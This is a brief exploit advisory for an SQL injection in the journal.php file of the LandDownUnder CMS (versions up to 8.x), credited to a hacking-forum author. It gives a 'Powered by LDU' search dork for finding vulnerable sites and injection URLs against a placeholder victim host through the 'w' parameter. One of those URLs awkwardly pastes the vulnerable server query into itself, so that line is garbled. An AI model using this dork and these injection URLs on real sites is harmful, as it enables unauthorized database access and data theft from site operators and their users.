LDU <= 8.x (journal.php) SQL Injection Vulnerability
# BhhGroup.Org & Trtekforum.com
#Found By : St@rExT
# script name : LandDownUnder [LDU]
#Version : All
#Dork : "Powered by LDU"
# Script sites : http://www.neocrome.net
#Vull name : LDU <= 8.x (journal.php) SQL Injection Vulnerability
# Vulnerable file : Journal.inc.php
http://victim.com/[scriptpath]/journal.php?m='&s=username&w=SELECT * FROM
$db_journals WHERE jrn_userid='$jrn_userid' AND
jrn_minlevel<='".$usr['level']."' ORDER BY jrn_$s $w
#[SQL Vuln.] :
http://victim.com/[scriptpath]/journal.php?m='&s=username&w=[SQL Inject]
#Contact: StareXt@xxxxxxx
######## - Tüm Müslüman insanların Bayramını
Kutlarım.. : ) - #####
################### - Ne Mutlu Türküm Diyene - ###################